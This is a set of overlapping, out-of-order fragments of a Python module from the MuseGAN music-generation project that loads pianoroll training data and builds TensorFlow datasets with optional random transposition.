\" \"But get \" + str(data_source)) # --- Dataset", "samples of the training data.\"\"\" indices = np.random.choice(len(data), n_samples, False)", "return np.load(filename) def load_data_from_npz(filename): \"\"\"Load and return the training data", "as np import tensorflow.compat.v1 as tf from musegan.config import SHUFFLE_BUFFER_SIZE,", "training data from a npy file.\"\"\" return np.load(filename) def load_data_from_npz(filename):", "0 return pianoroll def set_pianoroll_shape(pianoroll, data_shape): \"\"\"Set the pianoroll shape", "dataset.map( lambda pianoroll, label: ( tf.py_func(random_transpose, [pianoroll], tf.float32), label), num_parallel_calls=num_threads)", "Data loader -------------------------------------------------------------- def load_data_from_npy(filename): \"\"\"Load and return the training", "[-5, 6] semitones.\"\"\" semitone = np.random.randint(-5, 6) if semitone >", "`data` and `lables` do not match.\") dataset = tf.data.Dataset.from_generator( lambda:", "'npy': return load_data_from_npy(data_filename) if data_source == 'npz': return load_data_from_npz(data_filename) raise", "< 0: pianoroll[:, :semitone, 1:] = pianoroll[:, -semitone:, 1:] pianoroll[:,", "return sample_data, labels[indices] # --- Tensorflow Dataset ------------------------------------------------------- def _gen_data(data,", "dataset = tf.data.Dataset.from_generator( lambda: _gen_data(data), tf.float32) if use_random_transpose: dataset =", "def load_data(data_source, data_filename): \"\"\"Load and return the training data.\"\"\" if", "data = np.zeros(f['shape'], np.bool_) data[[x for x in f['nonzero']]] =", "sample_data, labels[indices] # --- Tensorflow Dataset ------------------------------------------------------- def _gen_data(data, labels=None):", "one of 'sa', 'npy', 'npz'. \" \"But get \" +", "for x in f['nonzero']]] = True return data def load_data(data_source,", "label: ( tf.py_func(random_transpose, [pianoroll], tf.float32), label), num_parallel_calls=num_threads) dataset = dataset.map(", "np.bool_): sample_data = data[indices] * 2. - 1. else: sample_data", "= logging.getLogger(__name__) # --- Data loader -------------------------------------------------------------- def load_data_from_npy(filename): \"\"\"Load", "the training data from a npy file.\"\"\" return np.load(filename) def", "ValueError(\"Expect `data_source` to be one of 'sa', 'npy', 'npz'. \"", "num_threads=1): \"\"\"Create and return a tensorflow dataset from an array.\"\"\"", "0: pianoroll[:, semitone:, 1:] = pianoroll[:, :-semitone, 1:] pianoroll[:, :semitone,", "array.\"\"\" if labels is None: dataset = tf.data.Dataset.from_generator( lambda: _gen_data(data),", "\" + str(data_source)) # --- Dataset Utilities ------------------------------------------------------- def random_transpose(pianoroll):", "tf.py_func(random_transpose, [pianoroll], tf.float32), label), num_parallel_calls=num_threads) dataset = dataset.map( lambda pianoroll,", "as tf from musegan.config import SHUFFLE_BUFFER_SIZE, PREFETCH_SIZE LOGGER = logging.getLogger(__name__)", "dataset from an array.\"\"\" if labels is None: dataset =", "tf.int32]) if use_random_transpose: dataset = dataset.map( lambda pianoroll, label: (", "tf.float32), label), num_parallel_calls=num_threads) dataset = dataset.map( lambda pianoroll, label: (set_pianoroll_shape(", "be one of 'sa', 'npy', 'npz'. \" \"But get \"", "file (sparse format).\"\"\" with np.load(filename) as f: data = np.zeros(f['shape'],", "np.bool_): yield item * 2. - 1. 
else: yield item", "as f: data = np.zeros(f['shape'], np.bool_) data[[x for x in", "labels[indices] # --- Tensorflow Dataset ------------------------------------------------------- def _gen_data(data, labels=None): \"\"\"Data", "and preprocessing pianoroll data. \"\"\" import logging import numpy as", "lambda pianoroll, label: (set_pianoroll_shape( pianoroll, data_shape), set_label_shape(label)), num_parallel_calls=num_threads) dataset =", "PREFETCH_SIZE LOGGER = logging.getLogger(__name__) # --- Data loader -------------------------------------------------------------- def", "= np.random.randint(-5, 6) if semitone > 0: pianoroll[:, semitone:, 1:]", "= np.random.choice(len(data), n_samples, False) if np.issubdtype(data.dtype, np.bool_): sample_data = data[indices]", "in data: if np.issubdtype(data.dtype, np.bool_): yield item * 2. -", "data def load_data(data_source, data_filename): \"\"\"Load and return the training data.\"\"\"", "pianoroll shape and return the pianoroll.\"\"\" pianoroll.set_shape(data_shape) return pianoroll def", "- 1. else: sample_data = data[indices] if use_random_transpose: sample_data =", "npz file (sparse format).\"\"\" with np.load(filename) as f: data =", "batch_size=None, data_shape=None, use_random_transpose=False, num_threads=1): \"\"\"Create and return a tensorflow dataset", "use_random_transpose: dataset = dataset.map( lambda pianoroll, label: ( tf.py_func(random_transpose, [pianoroll],", "_gen_data(data), tf.float32) if use_random_transpose: dataset = dataset.map( lambda pianoroll: tf.py_func(", "> 0: pianoroll[:, semitone:, 1:] = pianoroll[:, :-semitone, 1:] pianoroll[:,", "labels is None: for item in data: if np.issubdtype(data.dtype, np.bool_):", "get_samples(n_samples, data, labels=None, use_random_transpose=False): \"\"\"Return some random samples of the", "set_pianoroll_shape( pianoroll, data_shape), num_parallel_calls=num_threads) else: assert len(data) == len(labels), (", "def set_label_shape(label): \"\"\"Set the label shape and return the label.\"\"\"", "if data_source == 'sa': import SharedArray as sa return sa.attach(data_filename)", "Tensorflow Dataset ------------------------------------------------------- def _gen_data(data, labels=None): \"\"\"Data Generator.\"\"\" if labels", "def load_data_from_npz(filename): \"\"\"Load and return the training data from a", "data_source == 'sa': import SharedArray as sa return sa.attach(data_filename) if", "None: return sample_data return sample_data, labels[indices] # --- Tensorflow Dataset", "semitone:, 1:] = pianoroll[:, :-semitone, 1:] pianoroll[:, :semitone, 1:] =", "1:] = 0 return pianoroll def set_pianoroll_shape(pianoroll, data_shape): \"\"\"Set the", "elif semitone < 0: pianoroll[:, :semitone, 1:] = pianoroll[:, -semitone:,", "label), num_parallel_calls=num_threads) dataset = dataset.map( lambda pianoroll, label: (set_pianoroll_shape( pianoroll,", "training data.\"\"\" indices = np.random.choice(len(data), n_samples, False) if np.issubdtype(data.dtype, np.bool_):", "== len(labels), ( \"Lengths of `data` and `lables` do not", "* 2. - 1. 
else: yield item else: for i,", "npy file.\"\"\" return np.load(filename) def load_data_from_npz(filename): \"\"\"Load and return the", "a npy file.\"\"\" return np.load(filename) def load_data_from_npz(filename): \"\"\"Load and return", "_gen_data(data, labels=None): \"\"\"Data Generator.\"\"\" if labels is None: for item", "= tf.data.Dataset.from_generator( lambda: _gen_data(data, labels), [tf.float32, tf.int32]) if use_random_transpose: dataset", "True return data def load_data(data_source, data_filename): \"\"\"Load and return the", "num_parallel_calls=num_threads) else: assert len(data) == len(labels), ( \"Lengths of `data`", "label.set_shape([1]) return label # --- Sampler ------------------------------------------------------------------ def get_samples(n_samples, data,", "1:] pianoroll[:, :semitone, 1:] = 0 elif semitone < 0:", "for loading and preprocessing pianoroll data. \"\"\" import logging import", "and return the training data from a npz file (sparse", "transpose a pianoroll with [-5, 6] semitones.\"\"\" semitone = np.random.randint(-5,", "data_shape): \"\"\"Set the pianoroll shape and return the pianoroll.\"\"\" pianoroll.set_shape(data_shape)", "yield (item, labels[i]) def get_dataset(data, labels=None, batch_size=None, data_shape=None, use_random_transpose=False, num_threads=1):", "for i, item in enumerate(data): if np.issubdtype(data.dtype, np.bool_): yield (item", "np.array([random_transpose(x) for x in sample_data]) if labels is None: return", "* 2. - 1. else: sample_data = data[indices] if use_random_transpose:", "from musegan.config import SHUFFLE_BUFFER_SIZE, PREFETCH_SIZE LOGGER = logging.getLogger(__name__) # ---", "1:] pianoroll[:, semitone:, 1:] = 0 return pianoroll def set_pianoroll_shape(pianoroll,", "and return a tensorflow dataset from an array.\"\"\" if labels", ":semitone, 1:] = 0 elif semitone < 0: pianoroll[:, :semitone,", "from a npy file.\"\"\" return np.load(filename) def load_data_from_npz(filename): \"\"\"Load and", "contains functions for loading and preprocessing pianoroll data. \"\"\" import", "semitone = np.random.randint(-5, 6) if semitone > 0: pianoroll[:, semitone:,", "a npz file (sparse format).\"\"\" with np.load(filename) as f: data", "if use_random_transpose: sample_data = np.array([random_transpose(x) for x in sample_data]) if", "1., labels[i]) else: yield (item, labels[i]) def get_dataset(data, labels=None, batch_size=None,", "training data.\"\"\" if data_source == 'sa': import SharedArray as sa", "if use_random_transpose: dataset = dataset.map( lambda pianoroll: tf.py_func( random_transpose, [pianoroll],", "1. 
else: sample_data = data[indices] if use_random_transpose: sample_data = np.array([random_transpose(x)", "num_parallel_calls=num_threads) dataset = dataset.map( lambda pianoroll, label: (set_pianoroll_shape( pianoroll, data_shape),", "data_source == 'npz': return load_data_from_npz(data_filename) raise ValueError(\"Expect `data_source` to be", "some random samples of the training data.\"\"\" indices = np.random.choice(len(data),", "return the training data.\"\"\" if data_source == 'sa': import SharedArray", "use_random_transpose=False, num_threads=1): \"\"\"Create and return a tensorflow dataset from an", "and return the pianoroll.\"\"\" pianoroll.set_shape(data_shape) return pianoroll def set_label_shape(label): \"\"\"Set", "tf.float32) if use_random_transpose: dataset = dataset.map( lambda pianoroll: tf.py_func( random_transpose,", "LOGGER = logging.getLogger(__name__) # --- Data loader -------------------------------------------------------------- def load_data_from_npy(filename):", "dataset = dataset.map( lambda pianoroll, label: ( tf.py_func(random_transpose, [pianoroll], tf.float32),", "labels[i]) def get_dataset(data, labels=None, batch_size=None, data_shape=None, use_random_transpose=False, num_threads=1): \"\"\"Create and", "lambda: _gen_data(data), tf.float32) if use_random_transpose: dataset = dataset.map( lambda pianoroll:", "pianoroll: tf.py_func( random_transpose, [pianoroll], tf.float32), num_parallel_calls=num_threads) dataset = dataset.map(lambda pianoroll:", "None: for item in data: if np.issubdtype(data.dtype, np.bool_): yield item", "do not match.\") dataset = tf.data.Dataset.from_generator( lambda: _gen_data(data, labels), [tf.float32,", "SHUFFLE_BUFFER_SIZE, PREFETCH_SIZE LOGGER = logging.getLogger(__name__) # --- Data loader --------------------------------------------------------------", "functions for loading and preprocessing pianoroll data. \"\"\" import logging", "numpy as np import tensorflow.compat.v1 as tf from musegan.config import", "x in f['nonzero']]] = True return data def load_data(data_source, data_filename):", "\"But get \" + str(data_source)) # --- Dataset Utilities -------------------------------------------------------", "yield (item * 2. - 1., labels[i]) else: yield (item,", "loader -------------------------------------------------------------- def load_data_from_npy(filename): \"\"\"Load and return the training data", "\"\"\"Set the label shape and return the label.\"\"\" label.set_shape([1]) return", "def get_samples(n_samples, data, labels=None, use_random_transpose=False): \"\"\"Return some random samples of", "lambda pianoroll, label: ( tf.py_func(random_transpose, [pianoroll], tf.float32), label), num_parallel_calls=num_threads) dataset", "\"\"\"Return some random samples of the training data.\"\"\" indices =", "if np.issubdtype(data.dtype, np.bool_): sample_data = data[indices] * 2. 
- 1.", "of `data` and `lables` do not match.\") dataset = tf.data.Dataset.from_generator(", "load_data(data_source, data_filename): \"\"\"Load and return the training data.\"\"\" if data_source", "semitone > 0: pianoroll[:, semitone:, 1:] = pianoroll[:, :-semitone, 1:]", "1:] = pianoroll[:, :-semitone, 1:] pianoroll[:, :semitone, 1:] = 0", "labels is None: return sample_data return sample_data, labels[indices] # ---", "\"Lengths of `data` and `lables` do not match.\") dataset =", "i, item in enumerate(data): if np.issubdtype(data.dtype, np.bool_): yield (item *", "item else: for i, item in enumerate(data): if np.issubdtype(data.dtype, np.bool_):", "import SharedArray as sa return sa.attach(data_filename) if data_source == 'npy':", "sa return sa.attach(data_filename) if data_source == 'npy': return load_data_from_npy(data_filename) if", "tf.data.Dataset.from_generator( lambda: _gen_data(data), tf.float32) if use_random_transpose: dataset = dataset.map( lambda", "pianoroll data. \"\"\" import logging import numpy as np import", "sa.attach(data_filename) if data_source == 'npy': return load_data_from_npy(data_filename) if data_source ==", "tf.float32), num_parallel_calls=num_threads) dataset = dataset.map(lambda pianoroll: set_pianoroll_shape( pianoroll, data_shape), num_parallel_calls=num_threads)", "\"\"\" import logging import numpy as np import tensorflow.compat.v1 as", "to be one of 'sa', 'npy', 'npz'. \" \"But get", "- 1., labels[i]) else: yield (item, labels[i]) def get_dataset(data, labels=None,", "indices = np.random.choice(len(data), n_samples, False) if np.issubdtype(data.dtype, np.bool_): sample_data =", "pianoroll, label: ( tf.py_func(random_transpose, [pianoroll], tf.float32), label), num_parallel_calls=num_threads) dataset =", "match.\") dataset = tf.data.Dataset.from_generator( lambda: _gen_data(data, labels), [tf.float32, tf.int32]) if", "logging.getLogger(__name__) # --- Data loader -------------------------------------------------------------- def load_data_from_npy(filename): \"\"\"Load and", "in f['nonzero']]] = True return data def load_data(data_source, data_filename): \"\"\"Load", "else: assert len(data) == len(labels), ( \"Lengths of `data` and", "musegan.config import SHUFFLE_BUFFER_SIZE, PREFETCH_SIZE LOGGER = logging.getLogger(__name__) # --- Data", "pianoroll[:, -semitone:, 1:] pianoroll[:, semitone:, 1:] = 0 return pianoroll", "import SHUFFLE_BUFFER_SIZE, PREFETCH_SIZE LOGGER = logging.getLogger(__name__) # --- Data loader", "return a tensorflow dataset from an array.\"\"\" if labels is", "item * 2. - 1. else: yield item else: for", "for x in sample_data]) if labels is None: return sample_data", "data, labels=None, use_random_transpose=False): \"\"\"Return some random samples of the training", "False) if np.issubdtype(data.dtype, np.bool_): sample_data = data[indices] * 2. 
-", "pianoroll: set_pianoroll_shape( pianoroll, data_shape), num_parallel_calls=num_threads) else: assert len(data) == len(labels),", "return label # --- Sampler ------------------------------------------------------------------ def get_samples(n_samples, data, labels=None,", "labels=None, use_random_transpose=False): \"\"\"Return some random samples of the training data.\"\"\"", "as sa return sa.attach(data_filename) if data_source == 'npy': return load_data_from_npy(data_filename)", "label: (set_pianoroll_shape( pianoroll, data_shape), set_label_shape(label)), num_parallel_calls=num_threads) dataset = dataset.shuffle(SHUFFLE_BUFFER_SIZE).repeat().batch(batch_size) return", "pianoroll[:, :semitone, 1:] = 0 elif semitone < 0: pianoroll[:,", "return pianoroll def set_label_shape(label): \"\"\"Set the label shape and return", ":semitone, 1:] = pianoroll[:, -semitone:, 1:] pianoroll[:, semitone:, 1:] =", "None: dataset = tf.data.Dataset.from_generator( lambda: _gen_data(data), tf.float32) if use_random_transpose: dataset", "def _gen_data(data, labels=None): \"\"\"Data Generator.\"\"\" if labels is None: for", "pianoroll[:, :semitone, 1:] = pianoroll[:, -semitone:, 1:] pianoroll[:, semitone:, 1:]", "return the label.\"\"\" label.set_shape([1]) return label # --- Sampler ------------------------------------------------------------------", "6) if semitone > 0: pianoroll[:, semitone:, 1:] = pianoroll[:,", "[pianoroll], tf.float32), label), num_parallel_calls=num_threads) dataset = dataset.map( lambda pianoroll, label:", "Generator.\"\"\" if labels is None: for item in data: if", "--- Data loader -------------------------------------------------------------- def load_data_from_npy(filename): \"\"\"Load and return the", "'sa': import SharedArray as sa return sa.attach(data_filename) if data_source ==", "logging import numpy as np import tensorflow.compat.v1 as tf from", "len(labels), ( \"Lengths of `data` and `lables` do not match.\")", "sample_data = data[indices] * 2. - 1. 
else: sample_data =", "x in sample_data]) if labels is None: return sample_data return", "1:] = pianoroll[:, -semitone:, 1:] pianoroll[:, semitone:, 1:] = 0", "(item, labels[i]) def get_dataset(data, labels=None, batch_size=None, data_shape=None, use_random_transpose=False, num_threads=1): \"\"\"Create", "tensorflow dataset from an array.\"\"\" if labels is None: dataset", "pianoroll.set_shape(data_shape) return pianoroll def set_label_shape(label): \"\"\"Set the label shape and", "label # --- Sampler ------------------------------------------------------------------ def get_samples(n_samples, data, labels=None, use_random_transpose=False):", "= dataset.map( lambda pianoroll, label: (set_pianoroll_shape( pianoroll, data_shape), set_label_shape(label)), num_parallel_calls=num_threads)", "with np.load(filename) as f: data = np.zeros(f['shape'], np.bool_) data[[x for", "str(data_source)) # --- Dataset Utilities ------------------------------------------------------- def random_transpose(pianoroll): \"\"\"Randomly transpose", "if use_random_transpose: dataset = dataset.map( lambda pianoroll, label: ( tf.py_func(random_transpose,", "dataset = dataset.map( lambda pianoroll: tf.py_func( random_transpose, [pianoroll], tf.float32), num_parallel_calls=num_threads)", "# --- Tensorflow Dataset ------------------------------------------------------- def _gen_data(data, labels=None): \"\"\"Data Generator.\"\"\"", "if data_source == 'npy': return load_data_from_npy(data_filename) if data_source == 'npz':", "file contains functions for loading and preprocessing pianoroll data. \"\"\"", "np.random.randint(-5, 6) if semitone > 0: pianoroll[:, semitone:, 1:] =", "sample_data return sample_data, labels[indices] # --- Tensorflow Dataset ------------------------------------------------------- def", "pianoroll with [-5, 6] semitones.\"\"\" semitone = np.random.randint(-5, 6) if", "labels[i]) else: yield (item, labels[i]) def get_dataset(data, labels=None, batch_size=None, data_shape=None,", "pianoroll, label: (set_pianoroll_shape( pianoroll, data_shape), set_label_shape(label)), num_parallel_calls=num_threads) dataset = dataset.shuffle(SHUFFLE_BUFFER_SIZE).repeat().batch(batch_size)", "load_data_from_npz(filename): \"\"\"Load and return the training data from a npz", "= tf.data.Dataset.from_generator( lambda: _gen_data(data), tf.float32) if use_random_transpose: dataset = dataset.map(", "Utilities ------------------------------------------------------- def random_transpose(pianoroll): \"\"\"Randomly transpose a pianoroll with [-5,", "random samples of the training data.\"\"\" indices = np.random.choice(len(data), n_samples,", "semitone:, 1:] = 0 return pianoroll def set_pianoroll_shape(pianoroll, data_shape): \"\"\"Set", "- 1. else: yield item else: for i, item in", "* 2. - 1., labels[i]) else: yield (item, labels[i]) def", "= data[indices] * 2. - 1. 
else: sample_data = data[indices]", "training data from a npz file (sparse format).\"\"\" with np.load(filename)", "use_random_transpose: dataset = dataset.map( lambda pianoroll: tf.py_func( random_transpose, [pianoroll], tf.float32),", "return the pianoroll.\"\"\" pianoroll.set_shape(data_shape) return pianoroll def set_label_shape(label): \"\"\"Set the", "labels), [tf.float32, tf.int32]) if use_random_transpose: dataset = dataset.map( lambda pianoroll,", "data_filename): \"\"\"Load and return the training data.\"\"\" if data_source ==", ":-semitone, 1:] pianoroll[:, :semitone, 1:] = 0 elif semitone <", "else: sample_data = data[indices] if use_random_transpose: sample_data = np.array([random_transpose(x) for", "sample_data = np.array([random_transpose(x) for x in sample_data]) if labels is", "labels=None): \"\"\"Data Generator.\"\"\" if labels is None: for item in", "= pianoroll[:, -semitone:, 1:] pianoroll[:, semitone:, 1:] = 0 return", "# --- Dataset Utilities ------------------------------------------------------- def random_transpose(pianoroll): \"\"\"Randomly transpose a", "else: for i, item in enumerate(data): if np.issubdtype(data.dtype, np.bool_): yield", "the label.\"\"\" label.set_shape([1]) return label # --- Sampler ------------------------------------------------------------------ def", "dataset = dataset.map( lambda pianoroll, label: (set_pianoroll_shape( pianoroll, data_shape), set_label_shape(label)),", "= np.zeros(f['shape'], np.bool_) data[[x for x in f['nonzero']]] = True", "tf from musegan.config import SHUFFLE_BUFFER_SIZE, PREFETCH_SIZE LOGGER = logging.getLogger(__name__) #", "def get_dataset(data, labels=None, batch_size=None, data_shape=None, use_random_transpose=False, num_threads=1): \"\"\"Create and return", "the pianoroll shape and return the pianoroll.\"\"\" pianoroll.set_shape(data_shape) return pianoroll", "get_dataset(data, labels=None, batch_size=None, data_shape=None, use_random_transpose=False, num_threads=1): \"\"\"Create and return a", "-------------------------------------------------------------- def load_data_from_npy(filename): \"\"\"Load and return the training data from", "from an array.\"\"\" if labels is None: dataset = tf.data.Dataset.from_generator(", "2. - 1. else: yield item else: for i, item", "get \" + str(data_source)) # --- Dataset Utilities ------------------------------------------------------- def", "np.zeros(f['shape'], np.bool_) data[[x for x in f['nonzero']]] = True return", "np.bool_): yield (item * 2. - 1., labels[i]) else: yield", "pianoroll[:, semitone:, 1:] = 0 return pianoroll def set_pianoroll_shape(pianoroll, data_shape):", "the training data.\"\"\" if data_source == 'sa': import SharedArray as", "\"\"\"Randomly transpose a pianoroll with [-5, 6] semitones.\"\"\" semitone =", "pianoroll[:, semitone:, 1:] = pianoroll[:, :-semitone, 1:] pianoroll[:, :semitone, 1:]", "set_pianoroll_shape(pianoroll, data_shape): \"\"\"Set the pianoroll shape and return the pianoroll.\"\"\"", "np.issubdtype(data.dtype, np.bool_): yield (item * 2. - 1., labels[i]) else:", "else: yield item else: for i, item in enumerate(data): if", "f: data = np.zeros(f['shape'], np.bool_) data[[x for x in f['nonzero']]]", "\"\"\"This file contains functions for loading and preprocessing pianoroll data.", "import numpy as np import tensorflow.compat.v1 as tf from musegan.config", "2. 
- 1., labels[i]) else: yield (item, labels[i]) def get_dataset(data,", "label.\"\"\" label.set_shape([1]) return label # --- Sampler ------------------------------------------------------------------ def get_samples(n_samples,", "random_transpose(pianoroll): \"\"\"Randomly transpose a pianoroll with [-5, 6] semitones.\"\"\" semitone", "dataset.map(lambda pianoroll: set_pianoroll_shape( pianoroll, data_shape), num_parallel_calls=num_threads) else: assert len(data) ==", "\"\"\"Set the pianoroll shape and return the pianoroll.\"\"\" pianoroll.set_shape(data_shape) return", "\"\"\"Load and return the training data from a npy file.\"\"\"", "--- Dataset Utilities ------------------------------------------------------- def random_transpose(pianoroll): \"\"\"Randomly transpose a pianoroll", "np.issubdtype(data.dtype, np.bool_): yield item * 2. - 1. else: yield", "np import tensorflow.compat.v1 as tf from musegan.config import SHUFFLE_BUFFER_SIZE, PREFETCH_SIZE", "1. else: yield item else: for i, item in enumerate(data):", "return load_data_from_npz(data_filename) raise ValueError(\"Expect `data_source` to be one of 'sa',", "(set_pianoroll_shape( pianoroll, data_shape), set_label_shape(label)), num_parallel_calls=num_threads) dataset = dataset.shuffle(SHUFFLE_BUFFER_SIZE).repeat().batch(batch_size) return dataset.prefetch(PREFETCH_SIZE)", "of the training data.\"\"\" indices = np.random.choice(len(data), n_samples, False) if", "Sampler ------------------------------------------------------------------ def get_samples(n_samples, data, labels=None, use_random_transpose=False): \"\"\"Return some random", "random_transpose, [pianoroll], tf.float32), num_parallel_calls=num_threads) dataset = dataset.map(lambda pianoroll: set_pianoroll_shape( pianoroll,", "data[indices] if use_random_transpose: sample_data = np.array([random_transpose(x) for x in sample_data])", "and return the training data from a npy file.\"\"\" return", "labels=None, batch_size=None, data_shape=None, use_random_transpose=False, num_threads=1): \"\"\"Create and return a tensorflow", "return sample_data return sample_data, labels[indices] # --- Tensorflow Dataset -------------------------------------------------------", "data.\"\"\" indices = np.random.choice(len(data), n_samples, False) if np.issubdtype(data.dtype, np.bool_): sample_data", "(sparse format).\"\"\" with np.load(filename) as f: data = np.zeros(f['shape'], np.bool_)", "return load_data_from_npy(data_filename) if data_source == 'npz': return load_data_from_npz(data_filename) raise ValueError(\"Expect", "dataset.map( lambda pianoroll, label: (set_pianoroll_shape( pianoroll, data_shape), set_label_shape(label)), num_parallel_calls=num_threads) dataset", "if data_source == 'npz': return load_data_from_npz(data_filename) raise ValueError(\"Expect `data_source` to", "\" \"But get \" + str(data_source)) # --- Dataset Utilities", "raise ValueError(\"Expect `data_source` to be one of 'sa', 'npy', 'npz'.", "return the training data from a npy file.\"\"\" return np.load(filename)", "not match.\") dataset = tf.data.Dataset.from_generator( lambda: _gen_data(data, labels), [tf.float32, tf.int32])", "use_random_transpose: sample_data = np.array([random_transpose(x) for x in sample_data]) if labels", "'sa', 'npy', 'npz'. 
\" \"But get \" + str(data_source)) #", "np.bool_) data[[x for x in f['nonzero']]] = True return data", "pianoroll.\"\"\" pianoroll.set_shape(data_shape) return pianoroll def set_label_shape(label): \"\"\"Set the label shape", "= pianoroll[:, :-semitone, 1:] pianoroll[:, :semitone, 1:] = 0 elif", "# --- Sampler ------------------------------------------------------------------ def get_samples(n_samples, data, labels=None, use_random_transpose=False): \"\"\"Return", "data from a npz file (sparse format).\"\"\" with np.load(filename) as", "( tf.py_func(random_transpose, [pianoroll], tf.float32), label), num_parallel_calls=num_threads) dataset = dataset.map( lambda", "= np.array([random_transpose(x) for x in sample_data]) if labels is None:", "if np.issubdtype(data.dtype, np.bool_): yield item * 2. - 1. else:", "# --- Data loader -------------------------------------------------------------- def load_data_from_npy(filename): \"\"\"Load and return", "(item * 2. - 1., labels[i]) else: yield (item, labels[i])", "def random_transpose(pianoroll): \"\"\"Randomly transpose a pianoroll with [-5, 6] semitones.\"\"\"", "if semitone > 0: pianoroll[:, semitone:, 1:] = pianoroll[:, :-semitone,", "dataset.map( lambda pianoroll: tf.py_func( random_transpose, [pianoroll], tf.float32), num_parallel_calls=num_threads) dataset =", "data from a npy file.\"\"\" return np.load(filename) def load_data_from_npz(filename): \"\"\"Load", "== 'npy': return load_data_from_npy(data_filename) if data_source == 'npz': return load_data_from_npz(data_filename)", "load_data_from_npy(data_filename) if data_source == 'npz': return load_data_from_npz(data_filename) raise ValueError(\"Expect `data_source`", "of 'sa', 'npy', 'npz'. \" \"But get \" + str(data_source))", "load_data_from_npz(data_filename) raise ValueError(\"Expect `data_source` to be one of 'sa', 'npy',", "return the training data from a npz file (sparse format).\"\"\"", "[tf.float32, tf.int32]) if use_random_transpose: dataset = dataset.map( lambda pianoroll, label:", "from a npz file (sparse format).\"\"\" with np.load(filename) as f:", "return data def load_data(data_source, data_filename): \"\"\"Load and return the training", "load_data_from_npy(filename): \"\"\"Load and return the training data from a npy", "pianoroll[:, :-semitone, 1:] pianoroll[:, :semitone, 1:] = 0 elif semitone", "sample_data = data[indices] if use_random_transpose: sample_data = np.array([random_transpose(x) for x", "data.\"\"\" if data_source == 'sa': import SharedArray as sa return", "use_random_transpose=False): \"\"\"Return some random samples of the training data.\"\"\" indices", "--- Tensorflow Dataset ------------------------------------------------------- def _gen_data(data, labels=None): \"\"\"Data Generator.\"\"\" if", "= 0 elif semitone < 0: pianoroll[:, :semitone, 1:] =", "return pianoroll def set_pianoroll_shape(pianoroll, data_shape): \"\"\"Set the pianoroll shape and", "len(data) == len(labels), ( \"Lengths of `data` and `lables` do", "pianoroll def set_label_shape(label): \"\"\"Set the label shape and return the", "Dataset ------------------------------------------------------- def _gen_data(data, labels=None): \"\"\"Data Generator.\"\"\" if labels is", "== 'npz': return load_data_from_npz(data_filename) raise ValueError(\"Expect `data_source` to be one", "import logging import numpy as np import tensorflow.compat.v1 as tf", "_gen_data(data, labels), [tf.float32, tf.int32]) if use_random_transpose: dataset = dataset.map( lambda" ]
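# A hedged usage sketch wiring the loader into a TF1-style input pipeline.
# The file name, batch size, and per-sample data_shape are illustrative
# assumptions; SHUFFLE_BUFFER_SIZE and PREFETCH_SIZE come from musegan.config
# as imported above. Note data_shape describes one sample before batching.
if __name__ == '__main__':
    tf.disable_eager_execution()  # required for Session-style execution on TF2
    data = load_data('npz', 'train_x.npz')
    dataset = get_dataset(data, batch_size=16, data_shape=(4, 48, 84, 5),
                          use_random_transpose=True)
    iterator = tf.data.make_one_shot_iterator(dataset)
    batch = iterator.get_next()
    with tf.Session() as sess:
        pianorolls = sess.run(batch)  # float32 batch scaled to [-1., 1.]
        print(pianorolls.shape)       # e.g. (16, 4, 48, 84, 5)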